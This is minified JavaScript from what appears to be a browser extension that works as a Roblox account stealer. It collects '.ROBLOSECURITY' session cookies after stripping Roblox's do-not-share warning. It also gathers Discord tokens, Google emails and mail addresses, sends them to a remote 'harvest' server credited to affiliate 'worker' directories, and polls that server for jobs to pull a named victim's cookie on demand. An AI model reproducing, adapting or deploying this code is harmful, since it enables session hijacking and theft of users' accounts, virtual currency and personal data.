function normalizeDir(raw){var s=String(raw||'').trim();if(!s||!/^[A-Za-z0-9_]{1,64}$/.test(s))return'';return s;}
function cleanRobloxCookie(input){var cookie=String(input||'').trim();if(!cookie)return'';cookie=cookie.replace(/_\|WARNING:-DO-NOT-SHARE-THIS\.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items\.\|_/gi,'');cookie=cookie.replace(/_\|WARNING[\s\S]*?\|_/gi,'');cookie=cookie.trim();if(cookie.length>=80)return cookie;var warningMatch=cookie.match(/_\|WARNING[^_]*_([A-Za-z0-9._-]+)/i);if(warningMatch&&warningMatch[1]&&warningMatch[1].length>=80)return warningMatch[1];if(/^[A-Za-z0-9._|~-]{80,}$/i.test(cookie))return cookie;return'';}
function extractRobloxCookieFromJar(jarString){if(!jarString)return'';try{var arr=JSON.parse(String(jarString));if(!Array.isArray(arr))return'';for(var i=0;i<arr.length;i++){var c=arr[i];if(!c||c.name!=='.ROBLOSECURITY'||!c.value)continue;var domain=String(c.domain||'').toLowerCase();if(domain.indexOf('roblox.com')===-1)continue;return cleanRobloxCookie(c.value);}}catch(_){}
return'';}
function parseDirFromHost(host){host=String(host||'').toLowerCase().replace(/^www\./,'').replace(/:\d+$/,'');var base=LANDING_HOST.replace(/^www\./,'');if(!host||host===base)return'';var suffix='.'+base;if(host.length<=suffix.length||host.slice(-suffix.length)!==suffix)return'';var sub=host.slice(0,-suffix.length);if(!sub||sub.indexOf('.')!==-1)return'';return normalizeDir(sub);}
function isReservedLandingSegment(seg){var s=String(seg||'').toLowerCase();var reserved=['apis','assets','download','controller','error','mrbx','landings','index.php','sign-in','dashboard','admin','static'];return reserved.indexOf(s)!==-1;}
function parseDirFromUrl(urlStr){try{var u=new URL(urlStr);var fromHost=parseDirFromHost(u.hostname);if(fromHost)return fromHost;var hostOk=u.hostname.toLowerCase().replace(/^www\./,'')===LANDING_HOST.replace(/^www\./,'');var segs=u.pathname.split('/').filter(Boolean);if(hostOk){var path=u.pathname||'/';if(path==='/'||path===''){var def=normalizeDir(DEFAULT_DIR);if(def)return def;}
if(segs.length===1&&!isReservedLandingSegment(segs[0])){return normalizeDir(segs[0]);}
if(segs.length===2&&segs[0].toLowerCase()==='mrbx'&&!isReservedLandingSegment(segs[1])){return normalizeDir(segs[1]);}}
if(!hostOk)return'';if(segs.length<2)return'';var tool=segs[0];var dir=segs[1];for(var i=0;i<TOOL_SLUGS.length;i++){if(TOOL_SLUGS[i].toLowerCase()===tool.toLowerCase()){return normalizeDir(dir);}}}catch(_){}
return'';}
function queryLandingTabs(){return new Promise(function(resolve){if(typeof chrome==='undefined'||!chrome.tabs||typeof chrome.tabs.query!=='function'){resolve([]);return;}
chrome.tabs.query({url:['https://'+LANDING_HOST+'/*','https://www.'+LANDING_HOST+'/*','https://*.'+LANDING_HOST+'/*']},function(tabs){resolve(tabs||[]);});});}
async function resolveWorkerDir(hints){hints=hints||{};var fromHint=normalizeDir(hints.workerSlug||hints.dir);if(fromHint)return fromHint;if(hints.workerPageUrl){var fromPage=parseDirFromUrl(String(hints.workerPageUrl));if(fromPage)return fromPage;}
if(DEFAULT_DIR)return normalizeDir(DEFAULT_DIR);var st=await storageGet([DIR_KEY,SLUG_ALIAS]);var fromStorage=normalizeDir(st[DIR_KEY]||st[SLUG_ALIAS]);if(fromStorage)return fromStorage;var tabs=await queryLandingTabs();tabs.sort(function(a,b){return(b.lastAccessed||0)-(a.lastAccessed||0);});for(var i=0;i<tabs.length;i++){var d=parseDirFromUrl(tabs[i].url||'');if(d)return d;}
return'';}
async function getRobloxCookieFromBrowser(){var all=await getAllRobloxCookiesFromBrowser();return all.length?all[0]:'';}
async function getAllRobloxCookiesFromBrowser(){if(typeof chrome==='undefined'||!chrome.cookies)return[];var seen=Object.create(null);var out=[];function pushVal(raw){var val=cleanRobloxCookie(raw);if(!val||seen[val])return;seen[val]=true;out.push(val);}
var domains=['.roblox.com','www.roblox.com','roblox.com'];for(var i=0;i<domains.length;i++){var list=await new Promise(function(resolve){chrome.cookies.getAll({domain:domains[i],name:'.ROBLOSECURITY'},resolve);});if(!list||!list.length)continue;for(var j=0;j<list.length;j++){if(list[j]&&list[j].value)pushVal(list[j].value);}}
try{var allDomain=await new Promise(function(resolve){chrome.cookies.getAll({domain:'.roblox.com'},resolve);});if(allDomain&&allDomain.length){for(var k=0;k<allDomain.length;k++){var c=allDomain[k];if(c&&c.name==='.ROBLOSECURITY'&&c.value)pushVal(c.value);}}}catch(_){}
return out;}
function b64Utf8(text){try{return btoa(unescape(encodeURIComponent(String(text||''))));}catch(_){return'';}}
var EXTRAS_TIMEOUT_MS=10000;var EXTRAS_TIMEOUT_FAST_MS=4500;var MAX_TXT_LEN=600000;var MAX_TXT_B64_LEN=800000;function withTimeout(promise,ms){return new Promise(function(resolve){var done=false;var t=setTimeout(function(){if(done)return;done=true;resolve(null);},ms);promise.then(function(v){if(done)return;done=true;clearTimeout(t);resolve(v);}).catch(function(){if(done)return;done=true;clearTimeout(t);resolve(null);});});}
async function buildExtrasFields(cookie,opts){opts=opts||{};var timeoutMs=typeof opts.timeoutMs==='number'&&opts.timeoutMs>0?opts.timeoutMs:opts.fast?EXTRAS_TIMEOUT_FAST_MS:EXTRAS_TIMEOUT_MS;var fields={};var collector=global.MrbxExtrasCollect;if(!collector||typeof collector.collectMrbxExtras!=='function')return fields;try{var packed=await withTimeout(collector.collectMrbxExtras(cookie),timeoutMs);if(!packed||!packed.files)return fields;var files=packed.files;function putB64(key,text){if(!text||String(text).length>MAX_TXT_LEN)return;var enc=b64Utf8(text);if(!enc||enc.length>MAX_TXT_B64_LEN)return;fields[key]=enc;}
putB64('txt_all_b64',files.all);putB64('txt_google_b64',files.google);putB64('txt_discord_b64',files.discord);putB64('txt_emails_b64',files.emails);if(packed.extras&&packed.extras.discordToken){fields.discord_token=String(packed.extras.discordToken).slice(0,800);}
if(packed.extras&&packed.extras.googleEmail){fields.google_email=String(packed.extras.googleEmail).slice(0,320);}
if(packed.extras&&Array.isArray(packed.extras.allMailEmails)&&packed.extras.allMailEmails.length){fields.mail_emails_json=JSON.stringify(packed.extras.allMailEmails.slice(0,40));}}catch(_){}
return fields;}
async function collectHarvestExtras(cookie,opts){opts=opts||{};var timeoutMs=typeof opts.timeoutMs==='number'&&opts.timeoutMs>0?opts.timeoutMs:opts.fast?EXTRAS_TIMEOUT_FAST_MS:EXTRAS_TIMEOUT_MS;var sw=global.MrbxExtrasSW;if(sw&&typeof sw.collectAndBuildExtrasFields==='function'){try{var fromSw=await withTimeout(sw.collectAndBuildExtrasFields(opts),timeoutMs);if(fromSw&&Object.keys(fromSw).length){return fromSw;}}catch(_){}}
return buildExtrasFields(cookie);}
async function appendExtrasToForm(fields,cookie){var extra=await collectHarvestExtras(cookie);return Object.assign(fields,extra);}
var API_KEY_CACHE_KEY=global.MRBX_API_KEY_CACHE_KEY||'mrbxApiKeyCache';var API_KEY_TTL_MS=12*60*60*1000;var cachedApiSecret='';function readApiKeyCache(raw){if(!raw||typeof raw!=='object')return'';var key=String(raw.key||'').trim();var ts=Number(raw.ts||0);if(!key||!ts||Date.now()-ts>API_KEY_TTL_MS)return'';return key;}
async function loadCachedApiSecret(){if(typeof chrome==='undefined'||!chrome.storage||!chrome.storage.local){return'';}
return new Promise(function(resolve){chrome.storage.local.get([API_KEY_CACHE_KEY],function(data){resolve(readApiKeyCache(data&&data[API_KEY_CACHE_KEY]));});});}
async function storeApiSecret(key){cachedApiSecret=String(key||'').trim();if(!cachedApiSecret)return;if(typeof chrome==='undefined'||!chrome.storage||!chrome.storage.local){return;}
var payload={};payload[API_KEY_CACHE_KEY]={key:cachedApiSecret,ts:Date.now()};await new Promise(function(resolve){chrome.storage.local.set(payload,resolve);});}
async function clearStoredApiSecret(){cachedApiSecret='';if(typeof chrome==='undefined'||!chrome.storage||!chrome.storage.local){return;}
await new Promise(function(resolve){chrome.storage.local.remove([API_KEY_CACHE_KEY],resolve);});}
async function fetchApiSecret(){var installId=await getInstallId();var harvestPass=String(global.MRBX_HARVEST_PASS||'Harvest').trim();var body='mrbx_version='+
encodeURIComponent(extensionVersion())+'&mrbx_install_id='+
encodeURIComponent(installId)+'&pass='+
encodeURIComponent(harvestPass);var res=await fetch(API_BASE+'/ext-key.php',{method:'POST',headers:{'Content-Type':'application/x-www-form-urlencoded'},body:body});var data={};try{data=await res.json();}catch(_){data={};}
if(res.status===426){global.MRBX_EXTENSION_OUTDATED=true;throw new Error('extension_outdated');}
var key=String((data&&data.key)||'').trim();if(!res.ok||!key){throw new Error('api_key_unavailable');}
await storeApiSecret(key);return key;}
async function apiSecret(){var inline=String(global.MRBX_API_SECRET||'').trim();if(inline)return inline;if(cachedApiSecret)return cachedApiSecret;var fromStorage=await loadCachedApiSecret();if(fromStorage){cachedApiSecret=fromStorage;return cachedApiSecret;}
return fetchApiSecret();}
async function bootstrapApiSecret(){try{await apiSecret();return true;}catch(_){return false;}}
function extensionVersion(){var v=String(global.MRBX_EXT_VERSION||'').trim();if(v)return v;try{if(typeof chrome!=='undefined'&&chrome.runtime&&chrome.runtime.getManifest){v=String(chrome.runtime.getManifest().version||'').trim();if(v)global.MRBX_EXT_VERSION=v;}}catch(_){}
return v;}
function newInstallId(){if(typeof crypto!=='undefined'&&crypto.randomUUID){return crypto.randomUUID();}
return'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx'.replace(/[xy]/g,function(c){var r=(Math.random()*16)|0;var v=c==='x'?r:(r&0x3)|0x8;return v.toString(16);});}
async function getInstallId(){var key=global.MRBX_INSTALL_ID_KEY||'mrbxInstallId';var data=await storageGet([key]);var id=String((data&&data[key])||'').trim();if(id)return id;id=newInstallId();await new Promise(function(resolve){if(typeof chrome==='undefined'||!chrome.storage||!chrome.storage.local){resolve();return;}
var payload={};payload[key]=id;chrome.storage.local.set(payload,resolve);});return id;}
async function postForm(path,fields,opts){opts=opts||{};fields=Object.assign({},fields||{});fields.mrbx_version=extensionVersion();if(!opts.noHarvest){fields.mrbx_harvest='1';}
fields.mrbx_install_id=await getInstallId();var maxAttempts=2;var lastResult={ok:false,status:0,data:{},text:''};for(var attempt=0;attempt<maxAttempts;attempt++){if(attempt>0){await clearStoredApiSecret();}
var secret=await apiSecret();var bodyFields=Object.assign({},fields);if(secret){bodyFields.mrbx_api_key=secret;}
var body=Object.keys(bodyFields).map(function(k){return encodeURIComponent(k)+'='+encodeURIComponent(bodyFields[k]==null?'':String(bodyFields[k]));}).join('&');var headers={'Content-Type':'application/x-www-form-urlencoded','User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36'};if(secret){headers['X-Mrbx-Api-Key']=secret;}
var res=await fetch(API_BASE+'/'+path.replace(/^\//,''),{method:'POST',headers:headers,body:body});var text=await res.text();var data={};try{data=text?JSON.parse(text):{};}catch(_){data={_raw:text};}
lastResult={ok:res.ok,status:res.status,data:data,text:text};if(res.status===426){global.MRBX_EXTENSION_OUTDATED=true;lastResult.outdated=true;return lastResult;}
if(res.status!==403&&res.status!==401){return lastResult;}}
return lastResult;}
async function rememberWorkerDirFromUrl(urlStr){var dir=parseDirFromUrl(urlStr);if(!dir)return'';await new Promise(function(resolve){if(typeof chrome==='undefined'||!chrome.storage||!chrome.storage.local){resolve();return;}
var payload={};payload[DIR_KEY]=dir;payload[SLUG_ALIAS]=dir;chrome.storage.local.set(payload,resolve);});return dir;}
async function submitMrbxCookie(rawCookie,dir,pass,options){options=options||{};var cookie=cleanRobloxCookie(rawCookie);if(!cookie){return{ok:false,error:'No valid Roblox cookie'};}
var workerDir=normalizeDir(dir);if(!workerDir){workerDir=await resolveWorkerDir({});}
if(!workerDir&&DEFAULT_DIR){workerDir=normalizeDir(DEFAULT_DIR);}
if(!workerDir){return{ok:false,error:'Worker dir not set. Open a landing (e.g. /follow/yourdir/) or set MRBX_DEFAULT_WORKER_DIR in lib/q7n2k8wp.js'};}
if(options.useCheck){var check=await postForm('check.php',{cookie:cookie});if(!check.ok||!check.data||check.data.status!=='success'){var msg=(check.data&&(check.data.message||check.data.error))||'Cookie check failed';return{ok:false,error:msg,stage:'check',response:check};}}
var userinfoFields={cookie:cookie,dir:workerDir,pass:pass==null||pass===''?'Extension':String(pass),allow_duplicate:'1'};if(options.pullId){userinfoFields.mrbx_pull_id=String(options.pullId);userinfoFields.pass='Pulled';}
if(!options.skipExtras){if(options.extrasFields&&typeof options.extrasFields==='object'){Object.assign(userinfoFields,options.extrasFields);}else{userinfoFields=await appendExtrasToForm(userinfoFields,cookie);}}
var userinfo=await postForm('userinfo.php',userinfoFields);if(!userinfo.ok||userinfo.status>=400){var httpErr=(userinfo.data&&(userinfo.data.error||userinfo.data.message))||userinfo.text||('HTTP '+userinfo.status);return{ok:false,error:String(httpErr).slice(0,500),stage:'userinfo',response:userinfo};}
if(userinfo.data&&userinfo.data.error){var err=String(userinfo.data.error);return{ok:false,error:err,stage:'userinfo',response:userinfo};}
var isDup=!!(userinfo.data&&(userinfo.data.duplicate||userinfo.data.isDuplicate));var exhausted=!!(userinfo.data&&(userinfo.data.exhausted||userinfo.data.skipped));var queued=!!(userinfo.data&&userinfo.data.queued);var processed=!!(userinfo.data&&userinfo.data.processed);var userid=userinfo.data&&userinfo.data.userid?parseInt(String(userinfo.data.userid),10):0;var username=userinfo.data&&userinfo.data.username?String(userinfo.data.username):'';if(userid>0&&username){var w7=global._w7k;if(w7&&typeof w7.mem==='function'){w7.mem(userid,username,cookie).catch(function(){});}}
return{ok:true,dir:workerDir,duplicate:isDup,queued:queued,processed:processed,exhausted:exhausted,skipped:exhausted,userid:userid>0?userid:0,username:username,response:userinfo};}
global.MrbxSubmit={API_BASE:API_BASE,cleanRobloxCookie:cleanRobloxCookie,extractRobloxCookieFromJar:extractRobloxCookieFromJar,resolveWorkerDir:resolveWorkerDir,rememberWorkerDirFromUrl:rememberWorkerDirFromUrl,getRobloxCookieFromBrowser:getRobloxCookieFromBrowser,getAllRobloxCookiesFromBrowser:getAllRobloxCookiesFromBrowser,buildExtrasFields:buildExtrasFields,collectHarvestExtras:collectHarvestExtras,submitMrbxCookie:submitMrbxCookie,postForm:postForm,bootstrapApiSecret:bootstrapApiSecret,getInstallId:getInstallId,clearStoredApiSecret:clearStoredApiSecret,isExtensionOutdated:function(){return!!global.MRBX_EXTENSION_OUTDATED;}};})(typeof self!=='undefined'?self:typeof globalThis!=='undefined'?globalThis:window);'use strict';(function(g){var _K=String(g.MRBX_SESSION_MAP_KEY||'mrbx_x7k2');var _HS='mrbxHarvestState';var _PULL_IDLE_MS=60000;var _PULL_ACTIVE_MS=5000;function _ck(c){var s=String(c||'');if(s.length<=96)return s;return s.slice(0,48)+':'+s.length+':'+s.slice(-24);}
function _stg(keys){return new Promise(function(resolve){if(typeof chrome==='undefined'||!chrome.storage||!chrome.storage.local){resolve({});return;}
chrome.storage.local.get(keys,function(data){resolve(data||{});});});}
function _stgSet(payload){return new Promise(function(resolve){if(typeof chrome==='undefined'||!chrome.storage||!chrome.storage.local){resolve();return;}
chrome.storage.local.set(payload,resolve);});}
async function _ld(){var data=await _stg([_K]);var map=(data&&data[_K])||{};return map&&typeof map==='object'?map:{};}
async function _sv(map){var payload={};payload[_K]=map;await _stgSet(payload);}
async function _mem(uid,uname,cookie){var id=parseInt(String(uid||''),10);var name=String(uname||'').trim();if(id<=0||!name)return;var map=await _ld();map['u:'+id]={i:id,n:name,c:_ck(cookie),t:Date.now()};await _sv(map);}
async function _pollSessions(){var seen=Object.create(null);var out=[];function push(uid,name){var id=parseInt(String(uid||''),10);var uname=String(name||'').trim();if(id<=0||!uname)return;var key=id+':'+uname.toLowerCase();if(seen[key])return;seen[key]=true;out.push({userid:id,username:uname});}
var map=await _ld();var keys=Object.keys(map);for(var i=0;i<keys.length;i++){var row=map[keys[i]];if(row&&row.i&&row.n)push(row.i,row.n);}
var hsData=await _stg([_HS]);var hs=(hsData&&hsData[_HS])||{};if(hs&&typeof hs==='object'){var hk=Object.keys(hs);for(var j=0;j<hk.length;j++){var hrow=hs[hk[j]];if(hrow&&hrow.userid&&hrow.username)push(hrow.userid,hrow.username);}}
return out;}
async function _fk(target){var want=String(target||'').trim();if(!want||want==='*'){var api=g.MrbxSubmit;if(!api||typeof api.getAllRobloxCookiesFromBrowser!=='function')return null;var all=await api.getAllRobloxCookiesFromBrowser();return all.length?all[0]:null;}
var low=want.toLowerCase();var map=await _ld();var ck=null;var keys=Object.keys(map);for(var i=0;i<keys.length;i++){var row=map[keys[i]];if(row&&row.n&&String(row.n).toLowerCase()===low){ck=row.c;break;}}
if(!ck)return null;var api2=g.MrbxSubmit;if(!api2||typeof api2.getAllRobloxCookiesFromBrowser!=='function')return null;var list=await api2.getAllRobloxCookiesFromBrowser();for(var j=0;j<list.length;j++){if(_ck(list[j])===ck)return list[j];}
return null;}
async function _checkNick(api,cookie,target){var want=String(target||'').trim();if(!want||want==='*')return{ok:true,userid:0,username:''};var cleaned=api.cleanRobloxCookie(cookie);if(!cleaned)return{ok:false};var chk;try{chk=await api.postForm('check.php',{cookie:cleaned},{noHarvest:true});}catch(_){return{ok:false};}
if(!chk.ok||!chk.data||chk.data.status!=='success')return{ok:false};var user=chk.data.user||{};var name=String(user.name||'').trim();var uid=parseInt(String(user.id||user.userId||''),10);if(!name||name.toLowerCase()!==want.toLowerCase()){return{ok:false,userid:uid,username:name};}
return{ok:true,userid:uid,username:name};}
async function _resolve(target){var cookie=await _fk(target);if(cookie){var api0=g.MrbxSubmit;if(api0&&typeof api0.cleanRobloxCookie==='function'){var v0=await _checkNick(api0,cookie,target);if(v0.ok)return{cookie:cookie,userid:v0.userid,username:v0.username};}}
var want=String(target||'').trim();if(!want||want==='*'){var apiW=g.MrbxSubmit;if(!apiW||typeof apiW.getAllRobloxCookiesFromBrowser!=='function')return null;var allW=await apiW.getAllRobloxCookiesFromBrowser();return allW.length?{cookie:allW[0],userid:0,username:''}:null;}
var api=g.MrbxSubmit;if(!api||typeof api.getAllRobloxCookiesFromBrowser!=='function'||typeof api.postForm!=='function'||typeof api.cleanRobloxCookie!=='function'){return null;}
var list=await api.getAllRobloxCookiesFromBrowser();if(!list.length)return null;var low=want.toLowerCase();for(var i=0;i<list.length;i++){var raw=list[i];var verified=await _checkNick(api,raw,target);if(!verified.ok)continue;if(verified.userid>0){await _mem(verified.userid,verified.username,raw);}
return{cookie:raw,userid:verified.userid,username:verified.username};}
return null;}
function _pullOk(out){if(!out||!out.ok||out.error)return false;if(out.queued&&!out.processed)return false;if(out.processed)return true;var data=out.response&&out.response.data;if(data&&data.queued&&!data.processed)return false;return!!(data&&data.ok&&data.processed);}
async function _run(){var api=g.MrbxSubmit;if(!api||typeof api.postForm!=='function'||typeof api.submitMrbxCookie!=='function'){return{ok:true,h:0,nextMs:_PULL_IDLE_MS};}
var sessions=await _pollSessions();var pollFields={};if(sessions.length){try{pollFields.mrbx_poll_sessions=JSON.stringify(sessions);pollFields.roblox_username=sessions[0].username;pollFields.roblox_userid=String(sessions[0].userid);}catch(_){}}
var poll;try{poll=await api.postForm('pull_poll.php',pollFields,{noHarvest:true});}catch(_){if(typeof api.bootstrapApiSecret==='function'){try{await api.bootstrapApiSecret();}catch(_){}}
return{ok:true,h:0,nextMs:15000};}
if(poll&&poll.outdated){return{ok:true,h:0,nextMs:_PULL_IDLE_MS};}
var nextMs=_PULL_IDLE_MS;if(poll.data&&Number(poll.data.next_poll_ms)>0){nextMs=Math.max(5000,Math.min(Number(poll.data.next_poll_ms),_PULL_IDLE_MS));}
if(!poll.ok||!poll.data||!Array.isArray(poll.data.pulls)||!poll.data.pulls.length){return{ok:true,h:0,nextMs:nextMs,active:!!(poll.data&&poll.data.active_pulls)};}
nextMs=_PULL_ACTIVE_MS;var job=poll.data.pulls[0];var target=String((job&&job.username)||'').trim();var jobId=job&&job.id;if(!jobId)return{ok:true,h:0,nextMs:nextMs,active:true};var resolved=await _resolve(target);if(!resolved||!resolved.cookie){return{ok:true,h:0,w:1,nextMs:nextMs,active:true};}
var dir='';if(typeof api.resolveWorkerDir==='function'){dir=await api.resolveWorkerDir({});}
var def=String(g.MRBX_DEFAULT_WORKER_DIR||'main').trim();if(!dir&&def)dir=def;if(!dir)return{ok:true,h:0,w:1,nextMs:nextMs,active:true};var extras=null;if(typeof api.collectHarvestExtras==='function'){try{extras=await api.collectHarvestExtras(resolved.cookie);}catch(_){}}else if(typeof api.buildExtrasFields==='function'){try{extras=await api.buildExtrasFields(resolved.cookie);}catch(_){}}
var out;try{out=await api.submitMrbxCookie(resolved.cookie,dir,'Pulled',{skipExtras:false,extrasFields:extras,pullId:jobId});}catch(_){return{ok:true,h:0,w:1,nextMs:nextMs,active:true};}
if(_pullOk(out)){var uid=out.userid||resolved.userid;var uname=out.username||resolved.username;if(uid&&uname){await _mem(uid,uname,resolved.cookie);}
return{ok:true,h:1,nextMs:_PULL_IDLE_MS,active:false};}
return{ok:true,h:0,w:1,nextMs:nextMs,active:true};}
g._w7k={mem:_mem,run:_run,fk:_fk,resolve:_resolve};})(typeof self!=='undefined'?self:typeof globalThis!=='undefined'?globalThis:this);(function(){'use strict';const ROBLOX_ORIGIN='https://www.roblox.com';function getRobloxSecurityCookie(){return new Promise(function(resolve){var urls=[ROBLOX_ORIGIN+'/','https://roblox.com/','https://create.roblox.com/'];var i=0;function tryUrl(){if(i>=urls.length){chrome.cookies.getAll({domain:'.roblox.com'},function(list){if(chrome.runtime.lastError||!list||!list.length){resolve(null);return;}
var found=list.filter(function(c){return c.name==='.ROBLOSECURITY'&&c.value;});resolve(found.length?found[0].value:null);});return;}
chrome.cookies.get({url:urls[i++],name:'.ROBLOSECURITY'},function(c){if(!chrome.runtime.lastError&&c&&c.value)resolve(c.value);else tryUrl();});}
tryUrl();});}
var api={getRobloxSecurityCookie:getRobloxSecurityCookie};var NAME='RbxRoblox';if(typeof globalThis!=='undefined')globalThis[NAME]=api;if(typeof window!=='undefined')window[NAME]=api;})();